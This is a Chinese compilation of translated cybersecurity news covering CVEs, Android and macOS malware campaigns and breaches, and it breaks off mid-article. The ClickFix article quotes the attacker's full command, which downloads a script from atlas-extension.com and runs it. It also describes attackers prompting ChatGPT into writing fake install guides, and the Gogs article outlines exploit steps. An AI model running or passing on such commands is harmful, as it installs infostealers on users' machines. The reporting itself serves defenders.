HackerNews

HackerNews 编译，转载请注明出处： Plesk for Linux 中发现了一个严重的安全漏洞，可能允许用户在受影响的服务器上获取 root 访问权限。 该漏洞编号为 CVE-2025-66430，存在于 Plesk 的”密码保护目录”功能中，允许攻击者将任意数据注入 Apache 配置文件。 该漏洞源于”密码保护目录”功能对用户输入的处理不当。通过利用此漏洞，攻击者可以将恶意数据注入 Apache 配置，随后以 root 权限执行命令。 这代表一个关键的本地权限提升漏洞，对依赖 Plesk 进行服务器管理的组织构成了重大风险。 CVE ID 漏洞类型 受影响组件 CVE-2025-66430 本地权限提升 密码保护目录 任何有权访问”密码保护目录”功能的 Plesk 用户都可以利用此漏洞获取未经授权的 root 级别访问权限。 这使得攻击者能够以最高的系统权限执行任意命令，可能导致服务器完全被攻陷、数据盗窃、安装恶意软件或在网络内横向移动。 如果此漏洞未修补，运行受影响 Plesk 版本的组织将面临重大风险。从标准用户账户提升权限至 root 访问的能力，是服务器管理环境中最关键的安全威胁之一。 Plesk 已发布修复此漏洞的安全更新。 受影响的版本包括 Plesk 18.0.70 至 18.0.74。Plesk Onyx 安装也受到影响。 针对版本 18.0.73.5 和 18.0.74.2 的微更新已经发布，管理员应立即安装。为修复此漏洞，组织应立即更新其 Plesk 安装。 官方 Plesk 支持文档提供了在不同版本发布中安装更新的全面指南。 系统管理员应优先立即将所有受影响的 Plesk 安装更新至已修复的版本。 组织应审查”密码保护目录”功能的访问控制，并确保只有授权用户才能访问。 此外，建议监控日志中是否存在可疑的配置更改或命令执行尝试。 消息来源：cybersecuritynews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 一款名为 “Frogblight” 的复杂安卓银行木马已构成重大威胁，主要针对土耳其用户，采用欺骗手段窃取银行凭证和个人数据。 该恶意软件于2025年8月被发现，最初伪装成通过官方政府门户访问法庭案件文件的应用，后来演变为仿冒 Chrome 等流行应用的形式。 该恶意软件通过精心策划的社会工程手段进行传播。受害者会收到网络钓鱼短信，谎称其涉及法庭案件，短信中的链接会将用户导向旨在分发恶意应用的虚假政府网站。 一旦安装，”Frogblight” 便会请求访问敏感权限，包括读取和发送短信、访问存储空间以及获取设备信息。 当用户启动该应用时，欺骗行为仍在继续：它会通过嵌入式浏览器视图显示真实的政府网页，以制造一种虚假的真实感。 Securelist 的分析师指出，”Frogblight” 是一种多功能威胁，兼具银行盗窃能力和广泛的间谍软件功能。 该恶意软件会主动监控和记录短信、跟踪已安装的应用程序、监视设备文件系统，并能够向外部联系人发送任意文本消息。 最令人担忧的或许是，该恶意软件显示出持续活跃的开发迹象，在2025年9月期间增加了新功能，这表明其可能采用恶意软件即服务模式进行分发。 感染机制与指令架构 核心感染机制依赖于在受感染的 WebView 环境中注入 JavaScript 代码。当用户在恶意应用内显示的虚假政府门户网站上进行交互时，”Frogblight” 会悄无声息地捕获所有用户输入。 该恶意软件专门针对在线银行登录尝试，无论用户选择如何，都会在两秒延迟后自动启动银行登录屏幕。 与控制服务器的通信通过使用 Retrofit 库的 REST API 调用进行，恶意软件在活动期间每两秒向其控制器发送一次信号。 早期版本使用 REST API 端点来处理诸如获取待发消息、确认指令执行以及上传窃取的文件和数据等任务。 后续变种则转向使用 JSON 格式指令的 WebSocket 连接，以增强隐蔽性和持久性。 该恶意软件通过多个 Android 服务实现了复杂的持久化机制。AccessibilityAutoClickService 可防止应用被移除，同时打开攻击者指定的网站。PersistentService 负责处理与命令控制服务器的持续交互，而 BootReceiver 则通过任务调度和警报配置确保设备重启后恶意软件仍能持续存在。 “Frogblight” 还展示了其他规避技术，例如检测模拟器环境，以及使用地理围栏机制在美国境内禁用其功能。 在新版本的安卓系统上，该应用图标会变更为 “Davalarım”（土耳其语短语），而在较旧的系统上则保持隐藏。 卡巴斯基产品的检测签名包括 HEUR:Trojan-Banker.AndroidOS.Frogblight 及相关变种，有助于安全团队识别和拦截这一新兴威胁。 消息来源：cybersecuritynews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 苹果公司周五针对iOS、iPadOS、macOS、tvOS、watchOS、visionOS及其Safari网络浏览器发布了安全更新，以修复两个已被在野利用的安全漏洞。其中一个漏洞与谷歌本周初在Chrome浏览器中修复的漏洞相同。 漏洞信息如下： CVE-2025-43529（CVSS评分：暂无）：WebKit中的释放后使用漏洞，处理恶意构造的网页内容时可能导致任意代码执行。 CVE-2025-14174（CVSS评分：8.8）：WebKit中的内存损坏问题，处理恶意构造的网页内容时可能导致内存损坏。 苹果表示已意识到这些缺陷“可能已在针对iOS 26之前版本的特定目标个体的高度复杂攻击中被利用”。值得注意的是，CVE-2025-14174正是谷歌于2025年12月10日在其Chrome浏览器中修复的同一漏洞。谷歌将其描述为其开源图形层引擎库的Metal渲染器中存在的越界内存访问问题。 苹果安全工程与架构团队和谷歌威胁分析小组因发现并报告CVE-2025-14174漏洞获得致谢，而CVE-2025-43529漏洞由谷歌TAG发现。 考虑到这两个漏洞均影响WebKit渲染引擎（iOS和iPadOS上所有第三方浏览器包括Chrome、Microsoft Edge、Mozilla Firefox等均使用该引擎），它们很可能被用于高度定向的商业间谍软件攻击。 漏洞已在以下版本和设备中修复： iOS 26.2与iPadOS 26.2：iPhone 11及更新机型、第三代12.9英寸iPad Pro及更新机型、第一代11英寸iPad Pro及更新机型、第三代iPad Air及更新机型、第八代iPad及更新机型、第五代iPad mini及更新机型 iOS 18.7.3与iPadOS 18.7.3：iPhone XS及更新机型、13英寸iPad Pro、第三代12.9英寸iPad Pro及更新机型、第一代11英寸iPad Pro及更新机型、第三代iPad Air及更新机型、第七代iPad及更新机型、第五代iPad mini及更新机型 macOS Tahoe 26.2：运行macOS Tahoe的Mac电脑 tvOS 26.2：Apple TV HD与Apple TV 4K（所有型号） watchOS 26.2：Apple Watch Series 6及更新机型 visionOS 26.2：Apple Vision Pro（所有型号） Safari 26.2：运行macOS Sonoma与macOS Sequoia的Mac电脑 通过此次更新，苹果已在2025年累计修复了九个在野被利用的零日漏洞，包括CVE-2025-24085、CVE-2025-24200、CVE-2025-24201、CVE-2025-31200、CVE-2025-31201、CVE-2025-43200和CVE-2025-43300。 消息来源：thehackernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 华盛顿州皮尔斯县图书馆系统遭遇网络攻击，导致超过34万人的信息泄露。 皮尔斯县图书馆系统本周在其网站及多个州发布了违规通知信。这些信件涉及一起网络安全事件，该事件于4月21日首次被发现，迫使图书馆系统关闭了所有系统。 截至5月12日，该机构确认黑客入侵其系统并窃取了图书馆员工及客户信息。该图书馆系统共有19个分馆，服务西雅图郊外近百万人口的县区。 通知信称，调查显示黑客在4月15日至4月21日期间入侵了机构系统。泄露信息因用户身份而异：图书馆服务用户的姓名和出生日期遭泄露；当前或前任员工的失窃数据则包括社会安全号码、财务账户信息、驾照号码、信用卡信息、护照号码、健康保险信息及医疗数据。 今年5月，INC勒索软件团伙宣称对此次攻击负责。该团伙在2025年已针对政府系统发动多起严重攻击。 皮尔斯县此前曾在2023年遭遇针对公共巴士服务的勒索软件攻击，导致日均1.8万人使用的系统瘫痪。 近年来，公共图书馆系统反复遭受勒索软件团伙攻击，攻击者认为图书馆在线服务的需求将迫使政府支付赎金。 除了对大型系统等高知名度目标的大规模攻击外，美国多个州及加拿大的众多图书馆都曾因勒索软件攻击导致服务中断。 全球图书馆频遭攻击的状况甚至促使美国官员采取专项措施，专门收集关于网络安全和高级防火墙服务的数据，以帮助图书馆更好地防御黑客攻击。 消息来源：therecord.media； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 据称与巴勒斯坦武装组织哈马斯有关联的黑客组织被指控使用含恶意软件的文档，入侵了与阿曼、摩洛哥及巴勒斯坦权力机构相关的政府及外交实体。 帕洛阿尔托网络公司旗下Unit 42团队周四发布了一份关于该组织（其称为“灰兔”）的报告。该公司发言人向新闻媒体表示，基于多年来对该组织活动的分析，他们将其归属于哈马斯，称其“活动始终与哈马斯的战略利益保持一致”。 Unit 42指出，该组织近期活动涉及一种名为AshTag的新型恶意软件，使其得以从中东多国关键实体窃取信息。报告称，自2020年以来，“灰兔”组织的攻击手段日益复杂，发展了包括基础设施混淆等更高级的黑客技术及新工具。 该恶意软件通常伪装成涉及土耳其与巴勒斯坦实体关系的合法文档。尽管在巴以冲突期间其他哈马斯关联的黑客活动有所减少，“灰兔”组织却持续活跃，甚至在2025年10月停火后仍未停止。 AshTag恶意软件已使用多年，在10月宣布的加沙停火后仍被用于攻击。Unit 42观察到停火后该组织在某些受害环境中的直接操作活动。该恶意软件允许黑客提取文件、在受害设备下载内容并执行进一步操作。 最新攻击活动中使用的文档聚焦于土耳其与巴勒斯坦政治实体的关系，研究人员称这一转变表明土耳其实体可能成为其新的关注目标。 诱饵文档标题涉及摩洛哥与土耳其的合作关系、土耳其国防计划、哈马斯在叙利亚的活动以及巴勒斯坦政府事务等。 攻击始于一个受感染的PDF诱饵文件，引导目标下载包含恶意负载的RAR压缩包。 该组织已进行多项改进以提升操作安全性，采用不同策略使其活动更隐蔽地混入正常网络流量中。 在多起案例中，该组织利用恶意软件入侵受害系统后，直接通过键盘操控进行数据窃取。Unit 42曾发现攻击者直接从受害者邮箱下载文档——重点获取特定的外交相关文件。 研究人员表示：“‘灰兔’组织仍是持续活跃的间谍行为体，其明显意图是在近期地区冲突中继续运作——这与活动显著减少的其他关联威胁组织不同。特别是近两年来，该威胁组织的活动凸显了其持续进行情报收集的执着力。” 其他网络安全公司以“WIRTE”为名追踪该组织活动，并将其与“加沙网络组织”“Molerats”等更大团伙关联。研究人员此前曾将哈马斯关联黑客与针对以色列教育机构的SysJoker恶意软件联系起来。 消息来源：therecord.media； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： OpenAI周三透露，模型性能的激增已重塑了公司的内部规划。 根据一份新报告，通过CTF进行的能力评估显示，其性能从2025年8月GPT-5的27%提升至2025年11月GPT-5.1-Codex-Max的76%。 OpenAI警告称，一些即将推出的系统可能达到其“准备框架”中的“高”能力水平，这意味着它们最终可能协助完成从复杂入侵操作到零日漏洞利用开发等任务。 ThreatAware联合创始人兼首席执行官乔恩·阿博特表示，这一警告突显了关注基础防护的必要性。 “OpenAI警告新模型带来‘高’网络安全风险，这正是为什么确保安全基础绝对关键。AI可能正在加速攻击步伐，但我们最好的防御方式仍然是首先夯实基础。” 该公司还表示，正在通过开发多层次防护措施来应对这种可能性，旨在将先进能力引导至防御性结果。OpenAI补充说，其主要目标是加强网络安全团队的地位，这些团队目前仍面临人手不足和资源匮乏的问题。 加强行业整体理解 为管理网络工作流程中固有的双重用途风险，该公司概述了一个基于多个组件的深度防御策略： 访问控制、基础设施加固、出口控制和监控 引导模型避开有害请求，同时保持对教育和防御的实用性培训 能够阻止或重定向不安全活动的全系统检测工具 由外部专家进行的端到端红队测试 “这些防护措施旨在随着威胁形势的发展而演变，”该公司表示。 阿博特指出，能力的提升使得长期存在的威胁更加危险。 “传统威胁与AI实现的规模和精度相结合，形成了一种特别有害的组合，”他解释道。 “随着模型能够开发可用的零日远程漏洞利用或协助复杂、隐蔽的入侵，犯罪分子的入门门槛已大幅降低。” OpenAI表示，正在与全球专家协调，以改进防御性AI的实际应用，并正在为合格用户准备可信访问计划。 另一项名为“Aardvark”的计划已进入封闭测试阶段。这一智能安全研究代理可以扫描代码库、识别漏洞并提出修复方案，并在开源项目中发现了新的CVE漏洞。 OpenAI表示，还将启动一个“前沿风险委员会”，就负责任的能力使用提供建议，并通过“前沿模型论坛”进一步合作，以完善共享威胁模型并改进整个生态系统的缓解策略。 消息来源：infosecurity-magazine； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 网络安全研究人员发现了一场涉及19个Visual Studio Code扩展的攻击活动，这些扩展在其依赖文件夹中嵌入了恶意软件。 该活动自2025年2月开始活跃，于12月2日被识别。攻击者利用一个合法的npm包来伪装恶意文件，并将恶意二进制文件捆绑在一个伪装成PNG图像的存档文件中。 ReversingLabs观察到的这种手法使攻击者能够绕过常规检查，直接针对开发人员。 网络钓鱼手段的演变 2025年以来，一波新的恶意VS Code扩展不断传播。ReversingLabs指出，VS Code Marketplace上的可疑上传数量持续上升。 一些扩展模仿流行工具，另一些则宣传新功能但暗中执行恶意代码。即使是受信任的扩展也可能被攻陷：今年7月，一个恶意拉取请求通过添加有害依赖项污染了一个合法项目。 在这次新的攻击活动中，攻击者在扩展的node_modules文件夹中嵌入了经过修改的npm包path-is-absolute。 该原始包自2021年以来已被下载超过90亿次，但修改后的版本包含一个类，旨在VS Code启动时触发恶意软件。其目的是解码存储在名为“lock”的文件中的JavaScript投放器。 攻击者还包含了一个名为banner.png的文件，该文件看似无害，但实际上是一个包含两个二进制文件的存档。 投放器通过常见的离地生存二进制文件（LOLBIN）cmstp.exe启动这些文件。其中一个可执行文件通过模拟按键操作来关闭进程，另一个则是基于Rust的木马程序，截至报道时仍在分析中。 对开发人员日益增长的威胁 ReversingLabs表示，虽然大多数恶意扩展依赖修改后的path-is-absolute依赖项，但其他四个扩展则利用了npm包@actions/io，将有效负载存储在TypeScript和映射文件中，而非使用伪装的PNG文件。 尽管技术手段不同，但目标一致：通过受信任的组件秘密执行恶意软件。 ReversingLabs警告称，检测恶意VS Code扩展已变得日益紧迫。该公司表示，检测数量从2024年的27个增加到2025年前10个月的105个。 为降低风险，建议团队： 在安装前检查扩展 审计所有捆绑的依赖项 使用能够评估包行为的安全工具 “保持安全并非完全避免使用扩展，而是要认识到即使受信任的组件也可能被篡改，”ReversingLabs表示。 “所有提及的扩展均已向微软报告。”   消息来源：infosecurity-magazine； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 安全研究人员借助一项已有 20 年历史的攻击方法，成功从一款经济型智能手表中提取了固件，该方法最初是被用于窃取网络设备的数据。 这项名为 “指示灯（Blinkenlights）” 的技术，已被改造适配现代薄膜晶体管屏幕。 Quarkslab的分析师从当地商店以约 12 欧元的价格购入一款智能手表，经检测发现其配备的是虚假健康传感器，无法实现血压测量和睡眠监测功能。 该设备搭载JieLi AC6958C6 系统级芯片，并通过低功耗蓝牙进行通信，这一特性最初被视为提取固件的可行途径。 在对智能手表展开分析后，研究人员发现了一个表盘解析器漏洞 —— 该解析器未能对偏移边界进行有效校验。 这一安全缺陷可被利用来制造越界读取的情形，迫使设备将任意内存内容直接显示在屏幕上。 夸克实验室分析师指出，他们是在对自定义表盘的上传流程进行逆向工程后发现这一漏洞的，同时还发现固件解析器未对超出表盘二进制数据范围的图像偏移量进行验证。 研究团队在最终采用 “指示灯” 技术前，尝试了多种提取方案。 他们先是对杰理芯片的空中升级功能展开探索，却发现该功能仅支持固件上传，不支持固件下载。 设备所采用的认证机制基于蓝牙的 E1 传统功能，且内置硬编码参数，研究人员虽成功复现了这一机制，但这条路径最终未能实现固件提取。 现代版 “指示灯” 技术的实现方案 该团队搭建了一套定制硬件装置，核心为一块超频至 200 兆赫兹的树莓派 Pico 开发板，用于捕获智能手表主芯片向 NV3030B 屏幕控制器传输的数据。 这款屏幕采用 25 兆赫兹时钟，以 RGB565 格式传输像素数据，这就需要通过高速采样来精准获取信息。 研究人员将直径仅 0.1 毫米的导线焊接至屏幕连接器，并利用树莓派 Pico 的可编程输入输出（PIO）功能，在时钟上升沿对数据比特进行采样。 为保障高采样率下的运行效率，这款 PIO 程序仅设计了两条指令。 捕获的数据会先存储在树莓派 Pico 的 145000 字节缓冲区中，再通过 USB 串口传输至主机电脑。 为触发固件提取，研究人员制作了恶意自定义表盘，通过篡改偏移量数值，让智能手表读取并显示超出表盘预设数据区域的内存内容。 整个提取过程需要生成多款自定义表盘，每一款针对不同的内存地址。 研究人员在每个表盘里嵌入了包含同步字（0xa5a5a5a5）和魔术字节（0xdeadbeef）的特殊头文件，以此识别捕获到的数据块并验证数据对齐情况。 同时，团队开发了 Python 脚本，实现表盘生成、数据收集以及从零散内存切片中重建完整固件的自动化流程。 这项研究表明，当老旧的攻击技术与创新的漏洞利用手段相结合时，依然能对现代嵌入式设备构成威胁。 相较于昂贵的逻辑分析仪，此次采用的低成本硬件方案（除树莓派 Pico 外几乎无额外开销），在该场景下具备更高的实用性。 消息来源：cybersecuritynews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 根据最新研究，一种新发现的安卓恶意软件正在针对西班牙语用户发动攻击，能够将受害者锁在手机外并勒索赎金。 移动安全公司Zimperium的一份报告称，这种被命名为DroidLock的恶意软件，通过推送模仿合法安卓软件包的虚假应用程序的钓鱼网站进行传播。用户被诱骗安装一个投放器应用，该应用随后会部署包含实际恶意软件的次级有效载荷。 一旦激活，DroidLock可以完全控制受害者的手机，在屏幕上显示一条勒索软件风格的信息，威胁用户如果在24小时内不支付赎金就将删除所有文件。 该恶意软件并不加密数据，但研究人员警告，它有能力更改设备的PIN码、密码或生物识别设置——这实际上会使手机无法使用。该恶意软件还利用设备管理员权限来删除数据、静默通知，并利用手机前置摄像头拍摄图像。 此外，DroidLock会使用一个假的安卓更新界面来阻止用户交互，同时恶意活动在后台进行，并且它可以秘密记录受害者的屏幕活动并传输到远程服务器。 Zimperium没有说明有多少用户被感染或支付了赎金，也没有透露谁是这次攻击活动的幕后黑手。 随着黑客部署新技术来欺骗受害者和规避安全措施，移动恶意软件正在迅速发展。 今年10月，研究人员发现了一种名为Herodotus的新型安卓银行木马，它在受感染设备上进行远程控制操作时，通过模仿人类行为来规避检测。 另一种最近被观察到的恶意软件Sturnus，则可以拦截来自包括WhatsApp、Telegram和Signal在内的应用程序的解密信息。 消息来源：therecord.media； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 一个匿名黑客组织据称入侵了一家据信参与了俄罗斯统一征兵数据库建设工作的、名不见经传的俄罗斯科技公司的服务器。 据俄罗斯反战人权组织“走开”（Idite Lesom）的负责人格里戈里·斯维尔德洛夫称，黑客与他取得了联系，并移交了大量Mikord公司的内部文件，包括源代码、技术和财务记录，以及内部通信。斯维尔德洛夫表示，该组织声称已持续访问Mikord的系统数月之久，并已破坏了该公司部分基础设施。 “走开”组织旨在帮助俄罗斯人逃避征兵和动员，已被莫斯科列为“外国代理人”。斯维尔德洛夫本人因涉嫌散布关于俄罗斯军队的“假新闻”而面临刑事指控。 Mikord公司的网站已瘫痪数日，仅显示一条维护信息。本月早些时候，该公司的主页曾被黑客涂改，黑客当时声称打算将窃取的材料交给记者，之后会公开披露。 这家为政府机构和大型企业提供软件开发和自动化服务的公司，从未公开承认参与开发俄罗斯的新兵役登记系统。但总部位于拉脱维亚的调查媒体《重要故事》（iStories）表示，他们已经核实了泄露的材料，并确认Mikord参与了该项目。 Mikord的负责人拉米尔·加布德拉赫马诺夫向iStories承认公司遭到了黑客攻击。“听着，这种事谁没遇到过？现在很多人都被攻击了，”他告诉该媒体。但对于公司是否参与了军事数据库的工作，他拒绝置评。 俄罗斯国防部周四驳斥了这些报道，称有关入侵的说法“不属实”。该部表示，登记系统“运行正常”，没有发生个人数据泄露事件。该部补充说，该系统经常成为攻击目标，但所有攻击都已被“成功阻止”。 统一征兵数据库中存储了所有适龄服役公民的详细个人数据。该系统旨在简化动员流程，取代地方征兵办公室使用的苏联时期的纸质登记系统。 该黑客组织的身份和来源不明。Recorded Future News无法独立核实黑客提供给俄罗斯媒体和人权组织的文件的真实性。 12月初，疑似俄罗斯黑客曾针对乌克兰的多个国家登记系统——这些系统存储着生物特征数据、财产记录、法院判决、商业信息和税务文件——并短暂中断了乌克兰的数字兵役应用程序“Reserve+”。 消息来源：therecord.media； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 根据 Wiz 发布的新发现，Gogs 中存在一个高严重性且未修复的安全漏洞正遭到主动利用，已有超过700个可通过互联网访问的实例被入侵。 该漏洞编号为 CVE-2025-8110（CVSS 评分：8.7），是这一基于 Go 语言的自托管 Git 服务在其文件更新 API 中存在的一个文件覆写案例。据称，针对该问题的修复程序目前正在开发中。Wiz公司表示，他们是在2025年7月调查一名客户机器上的恶意软件感染时，意外发现了这个零日漏洞。 根据 CVE.org 上的漏洞描述：”Gogs 中 PutContents API 对符号链接的处理不当，允许本地代码执行。“ 这家云安全公司指出，CVE-2025-8110 实际上是对一个先前已修复的远程代码执行漏洞（CVE-2024-55947，CVSS 评分：8.7）的绕过。该漏洞允许攻击者向服务器上的任意路径写入文件，并获取服务器的 SSH 访问权限。CVE-2024-55947 已于 2024 年 12 月由维护者修复。 Wiz 表示，攻击者可以利用 Git（以及因此的 Gogs）允许在 git 仓库中使用符号链接，并且这些符号链接可以指向仓库外的文件或目录这一事实，来绕过 Gogs 为解决 CVE-2024-55947 而实施的修复。此外，Gogs 的 API 允许在常规 Git 协议之外修改文件。 因此，攻击者可以利用这种未能妥善处理符号链接的缺陷，通过一个四步过程实现任意代码执行： 创建一个标准的 git 仓库。 提交一个指向敏感目标的单个符号链接。 使用 PutContents API 向该符号链接写入数据，导致系统跟随链接并覆写仓库外的目标文件。 覆写 “.git/config” 文件（特别是 sshCommand 配置）以执行任意命令。 至于在此次攻击活动中部署的恶意软件，据评估是基于 Supershell 的有效负载。Supershell 是一个开源命令与控制框架，常被中国黑客组织使用，能够建立到攻击者控制服务器（”119.45.176[.]196″）的反向 SSH shell。 Wiz 称，利用 CVE-2025-8110 的攻击者在感染后本可以采取措施删除或在客户云工作负载上留下的已创建仓库（例如 “IV79VAew / Km4zoh4s“），但他们并没有这么做。这种粗心大意表明这可能是一场”打了就跑”式的攻击活动。 总体而言，互联网上暴露着大约 1,400 个 Gogs 实例，其中超过 700 个已显示出被入侵的迹象，特别是存在由8个字符随机组成的所有者/仓库名称。所有已识别的仓库均创建于 2025年7月10日 左右。 研究人员 Gili Tikochinski 和 Yaara Shriki 表示：”这表明单一的攻击者，或者可能是一组都使用相同工具的攻击者，应对所有感染负责。“ 鉴于该漏洞目前没有修复补丁，用户必须禁用公开注册功能，限制其暴露在互联网上，并扫描实例中是否存在具有8字符随机名称的仓库。 此次披露之际，Wiz 同时警告，威胁行为者正将泄露的 GitHub 个人访问令牌作为高价值入口点，用以获取对受害者云环境的初始访问权限，甚至利用它们实现从 GitHub 到云服务提供商控制平面的跨云横向移动。 当前的核心问题是，拥有通过 PAT 获得的基本读取权限的威胁行为者，可以利用 GitHub 的 API 代码搜索功能，发现直接嵌入在工作流 YAML 代码中的密钥名称。更复杂的是，如果被利用的 PAT 具有写入权限，攻击者就可以执行恶意代码并清除其恶意活动的痕迹。 研究员 Shira Ayal 表示：”攻击者利用被盗的 PAT 在代码库中发现 GitHub Action Secrets 的名称，并在新创建的恶意工作流中使用这些名称来执行代码并获取 CSP 密钥。我们还观察到威胁行为者将密钥外泄到他们控制的一个 Webhook 端点，完全绕过了 Action 日志。“ 消息来源：thehackernews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 多个印度监控摄像头制造商的产品中被发现存在一个严重的安全漏洞。该漏洞可能允许攻击者无需身份验证即可访问视频流并窃取账户凭证。 美国网络安全和基础设施安全局（CISA）于2025年12月9日发布了警报，警报代码为ICSA-25-343-03。 该漏洞影响范围包括来自D-Link印度有限公司、Sparsh Securitech和Securus CCTV等厂商的设备。 漏洞详情 该漏洞被归类为“关键功能缺少身份验证”（CWE-306），已分配编号 CVE-2025-13607，其CVSS v4评分为9.3分（严重等级）。 下表概括了该漏洞的关键信息： 项目 详情 CVE编号 CVE-2025-13607 CVSS v4 评分 9.3（严重） CVSS v3 评分 9.4（严重） 漏洞类型 关键功能缺少身份验证 CWE编号 CWE-306 攻击向量 网络 该漏洞使远程攻击者能够在无需身份验证的情况下，利用一个脆弱的URL端点，从而未经授权访问敏感的摄像头配置数据，包括管理账户凭证。 已确认受影响的设备为D-Link DCS-F5614-L1摄像头型号，其固件版本为v1.03.038及更早版本。 尽管Sparsh Securitech和Securus CCTV的具体受影响型号尚未明确，但使用这些厂商摄像头的组织面临相似的风险。 攻击向量与风险 此漏洞构成了严重威胁，因为它易于通过网络访问且攻击复杂度低。恶意攻击者无需特殊权限或用户交互即可利用此漏洞，使得远程攻击者可以轻而易举地执行攻击。 成功的利用将导致信息泄露，包括摄像头账户凭证的获取，可能危及监控基础设施并使得未授权系统访问成为可能。 厂商回应与建议措施 D-Link：已为受影响设备发布了安全更新并发布了安全公告。厂商强烈敦促立即安装补丁，并强调通过比对设备界面上的固件版本来验证更新是否成功。 Sparsh Securitech 与 Securus CCTV：CISA报告称，这些厂商未回应协调请求。因此，相关组织应直接联系厂商技术支持，以确定哪些型号受影响并获取修复指导。 CISA推荐了关键的防御措施，包括： 最小化网络暴露：将摄像头与互联网隔离。 加强访问控制：将摄像头置于防火墙之后进行访问限制，并对必需的远程访问实施VPN解决方案。 进行评估：在部署防御措施前，组织应进行影响分析。 目前，CISA尚未收到该漏洞在公开领域被主动利用的报告。但由于该漏洞严重且易于利用，受影响的监控系统需要立即进行修补和安全加固，以保护印度各地的企业和关键基础设施。 消息来源：cybersecuritynews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 一场新的恶意活动正通过一种新颖的攻击方式针对macOS用户，该攻击利用了ChatGPT的官方网站。 攻击者采用一种名为“ClickFix”的技术，通过在合法的chatgpt.com域名上发布虚假的安装指南来传播AMOS信息窃取木马。 此次活动利用了ChatGPT的聊天分享功能，任何用户都可以创建一个公共对话，并通过一个看似源自OpenAI官方网站的链接与他人分享。 攻击始于谷歌上的付费搜索广告。当用户搜索“chatgpt atlas”时，他们会遇到看似直接跳转到官方ChatGPT域名的赞助商链接。 谷歌搜索结果中的一个赞助商链接指向一个伪装成“macOS版ChatGPT Atlas”的恶意软件安装指南，该指南竟托管在官方ChatGPT网站上（来源：卡巴斯基） 该广告显示标题“ChatGPT™ Atlas for macOS – 下载Mac版ChatGPT Atlas”，这使其看起来完全合法。 点击这些广告的用户会被引导至一个共享的ChatGPT对话，其中包含针对不存在的Atlas浏览器的虚假安装说明。 经过深入分析，卡巴斯基安全研究人员确认，恶意行为者使用了提示词工程，迫使ChatGPT生成了一个看似可信的安装指南。 攻击者在将聊天公开之前，清除了聊天记录以移除任何可疑内容。 这个所谓的macOS版Atlas安装指南，仅仅是一个匿名用户与ChatGPT之间的共享聊天记录（来源：卡巴斯基） 该指南出现在chatgpt.com/share/子域名下，这可能会让那些未能意识到这只是一个共享对话而非OpenAI官方内容的用户，感觉其更加可信。 感染机制 虚假安装指南指示用户在Mac上打开终端应用程序，并运行一个特定命令。 恶意代码如下所示： /bin/bash -c “$(curl -fsSL ‘https://atlas-extension.com/gt’)” 此命令会从攻击者控制的服务器atlas-extension.com下载恶意脚本，并立即在受害者的计算机上执行。 脚本执行后，会提示输入系统密码，并反复询问直到输入正确密码为止。一旦密码被提供，脚本就会下载AMOS信息窃取木马，并使用窃取的凭证进行安装。 如果你询问ChatGPT是否应该遵循收到的指令，它会回答这不安全。 AMOS能够窃取Chrome和Firefox浏览器的密码、Cookie及其他浏览器数据。它还会从Electrum、Coinomi和Exodus等应用程序中窃取加密货币钱包信息。 该恶意软件会从桌面、文档和下载等文件夹中收集TXT、PDF和DOCX扩展名的文件。此外，它还会安装一个后门程序，该程序会在系统启动时自动运行，使攻击者能够持久远程访问受感染的系统。   消息来源：cybersecuritynews； 本文由 HackerNews.cc 翻译整理，封面来源于网络； 转载请注明“转自 HackerNews.cc”并附上原文

HackerNews 编译，转载请注明出处： 近期出现了一种新的恶意软件攻击活动，黑客通过利用合法的AI平台，直接向毫无防备的用户传播恶意代码。 攻击详情 攻击者通过谷歌搜索的赞助结果，将用户引导至伪造的ChatGPT和DeepSeek共享聊天链接。这些用户原本可能只是在搜索常见的macOS故障排除方法，例如“如何清理Mac存储空间”。 这些共享聊天看似提供了有用的系统操作指南，但实际上隐藏了用于入侵目标设备的恶意指令。 攻击始于用户接触到一条看似正规的共享对话，该对话会给出清理Mac存储空间的分步教程。 但教程中嵌有Base64编码指令，一旦执行，就会下载并运行一款复杂的多阶段恶意软件程序。 这种手法的狡猾之处在于，它绕过了AI平台通常实施的安全检查，使攻击者能够通过官方渠道直接向用户传递具有针对性的恶意指令。 感染流程始于一个bash脚本，该脚本会伪装成凭据验证弹窗，诱导用户输入系统密码。密码一旦被窃取，恶意软件便会借此提升权限，并从攻击者控制的服务器下载主恶意程序二进制文件。 Breakpoint Security的安全分析师将此样本识别为Shamus——一种已知的信息窃取和加密货币盗窃程序，已在安全社区中被广泛记录。 复杂策略 该恶意软件的复杂性体现在其多层编码和检测规避策略上。它结合算术编码、XOR编码和定制的6位解码器，以隐藏恶意代码，从而避免被分析工具发现。这种混淆手段使得安全研究人员仅通过静态分析极难识别其真实功能。 一旦安装成功，恶意软件会通过创建在系统启动时自动运行的LaunchDaemon，实现持久化系统访问。这确保了即使用户重启计算机，恶意软件仍能保持访问权限。其核心功能针对多类敏感数据，包括从Chrome、Firefox以及其他12款基于Chromium的浏览器中窃取Cookie和密码。 